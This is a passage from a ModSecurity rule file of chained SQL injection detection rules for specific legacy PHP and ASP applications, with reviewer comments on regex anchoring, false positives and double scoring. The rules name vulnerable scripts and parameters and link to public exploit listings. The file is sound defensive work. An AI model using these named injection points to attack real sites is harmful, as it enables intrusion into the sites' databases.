Injection Attempt -- order-track.php orderNo UPDATE',tag:'web-application-attack',tag:'url,www.securityfocus.com/bid/21072'" SecRule &TX:'/SQL_INJECTION.*ARGS:orderNo/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Koan Software Mega Mall SQL Injection Attempt -- order-track.php orderNo UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2006350) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Messageriescripthp SQL Injection Attempt -- lire-avis.php aa UPDATE SecRule REQUEST_LINE "@contains /lire-avis.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2006350,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS Messageriescripthp SQL Injection Attempt -- lire-avis.php aa UPDATE',tag:'web-application-attack',tag:'url,www.securityfocus.com/bid/21513'" SecRule &TX:'/SQL_INJECTION.*ARGS:aa/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Messageriescripthp SQL Injection Attempt -- lire-avis.php aa UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2006800) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Metyus Okul Yonetim Sistemi SQL Injection Attempt -- uye_giris_islem.asp kullanici_ismi UPDATE SecRule REQUEST_LINE "@contains /uye_giris_islem.asp" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2006800,rev:6,msg:'SLR: ET WEB_SPECIFIC_APPS Metyus Okul Yonetim Sistemi SQL Injection Attempt -- uye_giris_islem.asp kullanici_ismi UPDATE',tag:'web-application-attack',tag:'url,www.securityfocus.com/bid/21418'" SecRule &TX:'/SQL_INJECTION.*ARGS:kullanici_ismi/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Metyus Okul Yonetim Sistemi SQL Injection Attempt -- 
uye_giris_islem.asp kullanici_ismi UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'"

# NOTE(review): every rule in this run is a chain. The first SecRule checks that
# REQUEST_LINE contains the application path; the chained SecRule counts (&) TX
# variables whose name matches /SQL_INJECTION.*ARGS:<param>/ and matches when the
# count is above 0. On a full match the chain adds tx.critical_anomaly_score to
# tx.anomaly_score. The TX variables it looks for are presumably set by generic
# SQL injection rules evaluated earlier in the same transaction -- confirm the
# include order, because without them these chains cannot match.
# NOTE(review): "@contains" matches the path string anywhere in the request line,
# so a path that only appears inside a query-string value also satisfies it.

# (2006806) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Metyus Okul Yonetim Sistemi SQL Injection Attempt -- uye_giris_islem.asp sifre UPDATE
SecRule REQUEST_LINE "@contains /uye_giris_islem.asp" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2006806,rev:6,msg:'SLR: ET WEB_SPECIFIC_APPS Metyus Okul Yonetim Sistemi SQL Injection Attempt -- uye_giris_islem.asp sifre UPDATE',tag:'web-application-attack',tag:'url,www.securityfocus.com/bid/21418'"
SecRule &TX:'/SQL_INJECTION.*ARGS:sifre/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Metyus Okul Yonetim Sistemi SQL Injection Attempt -- uye_giris_islem.asp sifre UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'"

# NOTE(review): the name regex in the chained rule below is not anchored at the
# end, so "ARGS:id" also selects TX variables recorded for any parameter whose
# name merely starts with "id". Consider ending the pattern with "$" after
# checking it against the TX names your SQLi rules actually produce.
# (2005608) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS MiNT Haber Sistemi SQL Injection Attempt -- duyuru.asp id UPDATE
SecRule REQUEST_LINE "@contains /duyuru.asp" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2005608,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS MiNT Haber Sistemi SQL Injection Attempt -- duyuru.asp id UPDATE',tag:'web-application-attack',tag:'url,www.milw0rm.com/exploits/3120'"
SecRule &TX:'/SQL_INJECTION.*ARGS:id/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS MiNT Haber Sistemi SQL Injection Attempt -- duyuru.asp id UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'"

# (2007011) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS MidiCart ASP Shopping Cart and ASP Plus Shopping Cart SQL Injection Attempt -- item_show.asp id2006quant UPDATE
SecRule REQUEST_LINE "@contains /item_show.asp" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2007011,rev:6,msg:'SLR: ET WEB_SPECIFIC_APPS MidiCart ASP Shopping Cart and ASP Plus Shopping Cart SQL Injection Attempt -- item_show.asp id2006quant UPDATE',tag:'web-application-attack',tag:'url,www.securityfocus.com/bid/21273'"
SecRule &TX:'/SQL_INJECTION.*ARGS:id2006quant/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS MidiCart ASP Shopping Cart and ASP Plus Shopping Cart SQL Injection Attempt -- item_show.asp id2006quant UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'"

# (2007017) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS MidiCart ASP Shopping Cart and ASP Plus Shopping Cart SQL Injection Attempt -- item_list.asp maingroup UPDATE
SecRule REQUEST_LINE "@contains /item_list.asp" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2007017,rev:6,msg:'SLR: ET WEB_SPECIFIC_APPS MidiCart ASP Shopping Cart and ASP Plus Shopping Cart SQL Injection Attempt -- item_list.asp maingroup UPDATE',tag:'web-application-attack',tag:'url,www.securityfocus.com/bid/21273'"
SecRule &TX:'/SQL_INJECTION.*ARGS:maingroup/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS MidiCart ASP Shopping Cart and ASP Plus Shopping Cart SQL Injection Attempt -- item_list.asp maingroup UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'"

# (2007023) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS MidiCart ASP Shopping Cart and ASP Plus Shopping Cart SQL Injection Attempt -- item_list.asp secondgroup UPDATE
SecRule REQUEST_LINE "@contains /item_list.asp" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2007023,rev:6,msg:'SLR: ET WEB_SPECIFIC_APPS MidiCart ASP Shopping Cart and ASP Plus Shopping Cart SQL Injection Attempt -- item_list.asp secondgroup UPDATE',tag:'web-application-attack',tag:'url,www.securityfocus.com/bid/21273'"
SecRule &TX:'/SQL_INJECTION.*ARGS:secondgroup/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS MidiCart ASP Shopping Cart and ASP Plus Shopping Cart SQL Injection Attempt -- item_list.asp secondgroup UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'"

# NOTE(review): "ARGS:c" in the chained rule below is a one-letter, unanchored
# name pattern; it selects TX variables for every parameter whose name begins
# with "c", which makes this chain prone to false positives on any forum.php.
# (2004169) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Minerva mod SQL Injection Attempt -- forum.php c UPDATE
SecRule REQUEST_LINE "@contains /forum.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2004169,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS Minerva mod SQL Injection Attempt -- forum.php c UPDATE',tag:'web-application-attack',tag:'url,www.milw0rm.com/exploits/3519'"
SecRule &TX:'/SQL_INJECTION.*ARGS:c/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Minerva mod SQL Injection Attempt -- forum.php c UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'"

# (2005783) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Motionborg Web Real Estate SQL Injection Attempt -- admin_check_user.asp txtUserName UPDATE
SecRule REQUEST_LINE "@contains /admin_check_user.asp" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2005783,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS Motionborg Web Real Estate SQL Injection Attempt -- admin_check_user.asp txtUserName
UPDATE',tag:'web-application-attack',tag:'url,www.milw0rm.com/exploits/3105'"
SecRule &TX:'/SQL_INJECTION.*ARGS:txtUserName/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Motionborg Web Real Estate SQL Injection Attempt -- admin_check_user.asp txtUserName UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'"

# NOTE(review): the rules in this run are chains: a REQUEST_LINE "@contains <path>"
# test followed by a count (&) of TX variables whose name matches
# /SQL_INJECTION.*ARGS:<param>/. They add no SQL injection detection of their own;
# they attribute a hit that an earlier rule already recorded in TX to a named
# application (presumably the generic SQLi rules -- confirm they are loaded first).
# NOTE(review): the path test below is only "/index.php", which nearly every PHP
# site serves, so this chain identifies the application only as far as the
# parameter name does. Scope it to the hosts or locations that run the product.
# (2003840) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS MyConference SQL Injection Attempt -- index.php cid UPDATE
SecRule REQUEST_LINE "@contains /index.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2003840,rev:6,msg:'SLR: ET WEB_SPECIFIC_APPS MyConference SQL Injection Attempt -- index.php cid UPDATE',tag:'web-application-attack',tag:'url,www.frsirt.com/english/advisories/2007/1830'"
SecRule &TX:'/SQL_INJECTION.*ARGS:cid/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS MyConference SQL Injection Attempt -- index.php cid UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'"

# (2006632) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS MyStats SQL Injection Attempt -- mystats.php details UPDATE
SecRule REQUEST_LINE "@contains /mystats.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2006632,rev:6,msg:'SLR: ET WEB_SPECIFIC_APPS MyStats SQL Injection Attempt -- mystats.php details UPDATE',tag:'web-application-attack',tag:'cve,CVE-2006-6403'"
SecRule &TX:'/SQL_INJECTION.*ARGS:details/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS MyStats SQL Injection Attempt -- mystats.php details UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'"

# (2004617) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS My Datebook SQL Injection Attempt -- diary.php delete UPDATE
SecRule REQUEST_LINE "@contains /diary.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2004617,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS My Datebook SQL Injection Attempt -- diary.php delete UPDATE',tag:'web-application-attack',tag:'url,www.securityfocus.com/archive/1/archive/1/470483/100/0/threaded'"
SecRule &TX:'/SQL_INJECTION.*ARGS:delete/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS My Datebook SQL Injection Attempt -- diary.php delete UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'"

# NOTE(review): "ARGS:id" below has no end anchor, so TX variables recorded for
# any parameter whose name starts with "id" also satisfy the count.
# (2004100) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS My Little Forum SQL Injection Attempt -- user.php id UPDATE
SecRule REQUEST_LINE "@contains /user.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2004100,rev:7,msg:'SLR: ET WEB_SPECIFIC_APPS My Little Forum SQL Injection Attempt -- user.php id UPDATE',tag:'web-application-attack',tag:'url,www.exploit-db.com/exploits/3989/'"
SecRule &TX:'/SQL_INJECTION.*ARGS:id/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS My Little Forum SQL Injection Attempt -- user.php id UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'"

# (2004747) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Nabopoll SQL Injection Attempt -- result.php surv UPDATE
SecRule REQUEST_LINE "@contains /result.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2004747,rev:6,msg:'SLR: ET WEB_SPECIFIC_APPS Nabopoll SQL Injection Attempt -- result.php surv
UPDATE',tag:'web-application-attack',tag:'url,www.exploit-db.com/exploits/3355/'"
SecRule &TX:'/SQL_INJECTION.*ARGS:surv/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Nabopoll SQL Injection Attempt -- result.php surv UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'"

# NOTE(review): chain = REQUEST_LINE path test, then a count (&) of TX variables
# named like /SQL_INJECTION.*ARGS:id/; on a match the critical anomaly score is
# added to tx.anomaly_score. The name pattern is unanchored, so parameters whose
# names only begin with "id" count as well.
# (2006885) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Neocrome Land Down Under (LDU) SQL Injection Attempt -- users.php id UPDATE
SecRule REQUEST_LINE "@contains /users.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2006885,rev:6,msg:'SLR: ET WEB_SPECIFIC_APPS Neocrome Land Down Under (LDU) SQL Injection Attempt -- users.php id UPDATE',tag:'web-application-attack',tag:'url,www.securityfocus.com/bid/21227'"
SecRule &TX:'/SQL_INJECTION.*ARGS:id/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Neocrome Land Down Under (LDU) SQL Injection Attempt -- users.php id UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'"

# NOTE(review): unlike the parameter-scoped chains, the chained rule below runs
# its own regex, (?i:UPDATE.+SET), over QUERY_STRING and REQUEST_BODY. It is
# case-insensitive and has no word boundaries, so ordinary text such as
# "updated ... settings" matches; expect false positives on free-text fields and
# tune per site before relying on the score it adds.
# (2006741) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Neocrome Seditio SQL Injection Attempt -- ipsearch.admin.php UPDATE
SecRule REQUEST_LINE "@contains /plugins/ipsearch/ipsearch.admin.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2006741,rev:6,msg:'SLR: ET WEB_SPECIFIC_APPS Neocrome Seditio SQL Injection Attempt -- ipsearch.admin.php UPDATE',tag:'web-application-attack',tag:'url,www.secunia.com/advisories/23180'"
SecRule QUERY_STRING|REQUEST_BODY "(?i:UPDATE.+SET)" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Neocrome Seditio SQL Injection Attempt -- ipsearch.admin.php
UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'"

# NOTE(review): the two Seditio chains below pair a REQUEST_LINE path test with
# the regex (?i:UPDATE.+SET) applied to QUERY_STRING and REQUEST_BODY. The regex
# is case-insensitive and has no word boundaries, so benign text containing
# "update" followed later by "set" also matches; tune before enforcing.
# (2006747) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Neocrome Seditio SQL Injection Attempt -- pfs.edit.inc.php UPDATE
SecRule REQUEST_LINE "@contains /pfs/pfs.edit.inc.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2006747,rev:6,msg:'SLR: ET WEB_SPECIFIC_APPS Neocrome Seditio SQL Injection Attempt -- pfs.edit.inc.php UPDATE',tag:'web-application-attack',tag:'url,www.secunia.com/advisories/23180'"
SecRule QUERY_STRING|REQUEST_BODY "(?i:UPDATE.+SET)" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Neocrome Seditio SQL Injection Attempt -- pfs.edit.inc.php UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'"

# (2006753) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Neocrome Seditio SQL Injection Attempt -- users.register.inc.php UPDATE
SecRule REQUEST_LINE "@contains /system/core/users/users.register.inc.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2006753,rev:6,msg:'SLR: ET WEB_SPECIFIC_APPS Neocrome Seditio SQL Injection Attempt -- users.register.inc.php UPDATE',tag:'web-application-attack',tag:'url,www.secunia.com/advisories/23180'"
SecRule QUERY_STRING|REQUEST_BODY "(?i:UPDATE.+SET)" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Neocrome Seditio SQL Injection Attempt -- users.register.inc.php UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'"

# NOTE(review): from here on the chained rule counts (&) TX variables whose name
# matches /SQL_INJECTION.*ARGS:<param>/ instead of running a regex of its own;
# those variables are presumably written by generic SQLi rules that ran earlier
# in the transaction -- confirm the load order.
# (2006759) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Neocrome Seditio SQL Injection Attempt -- polls.php id UPDATE
SecRule REQUEST_LINE "@contains /polls.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2006759,rev:6,msg:'SLR: ET WEB_SPECIFIC_APPS Neocrome Seditio SQL Injection Attempt -- polls.php id UPDATE',tag:'web-application-attack',tag:'url,www.secunia.com/advisories/23180'"
SecRule &TX:'/SQL_INJECTION.*ARGS:id/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Neocrome Seditio SQL Injection Attempt -- polls.php id UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'"

# NOTE(review): this chain has the same two conditions ("@contains /users.php"
# and /SQL_INJECTION.*ARGS:id/) as rule 2006885 (Land Down Under) in this file.
# One request therefore satisfies both chains and the critical anomaly score is
# added twice; account for that when setting the blocking threshold.
# (2007293) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Neocrome Seditio SQL Injection Attempt -- users.php id UPDATE
SecRule REQUEST_LINE "@contains /users.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2007293,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS Neocrome Seditio SQL Injection Attempt -- users.php id UPDATE',tag:'web-application-attack',tag:'url,www.securityfocus.com/archive/1/archive/1/452269/100/100/threaded'"
SecRule &TX:'/SQL_INJECTION.*ARGS:id/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Neocrome Seditio SQL Injection Attempt -- users.php id UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'"

# (2006552) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS NetClassifieds Premium Edition SQL Injection Attempt -- ViewCat.php s_user_id UPDATE
SecRule REQUEST_LINE "@contains /ViewCat.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2006552,rev:6,msg:'SLR: ET WEB_SPECIFIC_APPS NetClassifieds Premium Edition SQL Injection Attempt -- ViewCat.php s_user_id UPDATE',tag:'web-application-attack',tag:'url,www.securityfocus.com/bid/24584'"
SecRule &TX:'/SQL_INJECTION.*ARGS:s_user_id/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS NetClassifieds Premium Edition SQL Injection Attempt -- ViewCat.php s_user_id UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'"

# (2004163) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS NetVIOS Portal SQL Injection Attempt -- page.asp NewsID UPDATE
SecRule REQUEST_LINE "@contains /News/page.asp" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2004163,rev:6,msg:'SLR: ET WEB_SPECIFIC_APPS NetVIOS Portal SQL Injection Attempt -- page.asp NewsID UPDATE',tag:'web-application-attack',tag:'url,www.exploit-db.com/exploits/3520/'"
SecRule &TX:'/SQL_INJECTION.*ARGS:NewsID/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS NetVIOS Portal SQL Injection Attempt -- page.asp NewsID UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'"

# (2004941) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Neuron Blog SQL Injection Attempt -- addcomment2.php commentname UPDATE
SecRule REQUEST_LINE "@contains /pages/addcomment2.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2004941,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS Neuron Blog SQL Injection Attempt -- addcomment2.php commentname UPDATE',tag:'web-application-attack',tag:'url,www.secunia.com/advisories/19703'"
SecRule &TX:'/SQL_INJECTION.*ARGS:commentname/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Neuron Blog SQL Injection Attempt -- addcomment2.php commentname UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'"

# (2004948) SpiderLabs
Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Neuron Blog SQL Injection Attempt -- addcomment2.php commentmail UPDATE
# NOTE(review): the Neuron Blog chains below test REQUEST_LINE for
# /pages/addcomment2.php and then count (&) TX variables whose name matches
# /SQL_INJECTION.*ARGS:<param>/. The TX variables are presumably written by
# generic SQLi rules evaluated earlier -- confirm the load order.
SecRule REQUEST_LINE "@contains /pages/addcomment2.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2004948,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS Neuron Blog SQL Injection Attempt -- addcomment2.php commentmail UPDATE',tag:'web-application-attack',tag:'url,www.secunia.com/advisories/19703'"
SecRule &TX:'/SQL_INJECTION.*ARGS:commentmail/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Neuron Blog SQL Injection Attempt -- addcomment2.php commentmail UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'"

# (2004954) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Neuron Blog SQL Injection Attempt -- addcomment2.php commentwebsite UPDATE
SecRule REQUEST_LINE "@contains /pages/addcomment2.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2004954,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS Neuron Blog SQL Injection Attempt -- addcomment2.php commentwebsite UPDATE',tag:'web-application-attack',tag:'url,www.secunia.com/advisories/19703'"
SecRule &TX:'/SQL_INJECTION.*ARGS:commentwebsite/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Neuron Blog SQL Injection Attempt -- addcomment2.php commentwebsite UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'"

# NOTE(review): "ARGS:comment" below is unanchored, so it also selects the TX
# variables recorded for commentmail and commentwebsite (and commentname). A hit
# on any of those parameters satisfies this chain in addition to its own, adding
# the critical anomaly score more than once. Anchor the name with "$" if only the
# "comment" parameter is meant -- verify against the TX names actually produced.
# (2004960) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Neuron Blog SQL Injection Attempt -- addcomment2.php comment UPDATE
SecRule REQUEST_LINE "@contains /pages/addcomment2.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2004960,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS Neuron Blog SQL Injection Attempt -- addcomment2.php comment UPDATE',tag:'web-application-attack',tag:'url,www.secunia.com/advisories/19703'"
SecRule &TX:'/SQL_INJECTION.*ARGS:comment/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Neuron Blog SQL Injection Attempt -- addcomment2.php comment UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'"

# (2005680) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Nicola Asuni All In One Control Panel (AIOCP) SQL Injection Attempt -- cp_functions_downloads.php download_category UPDATE
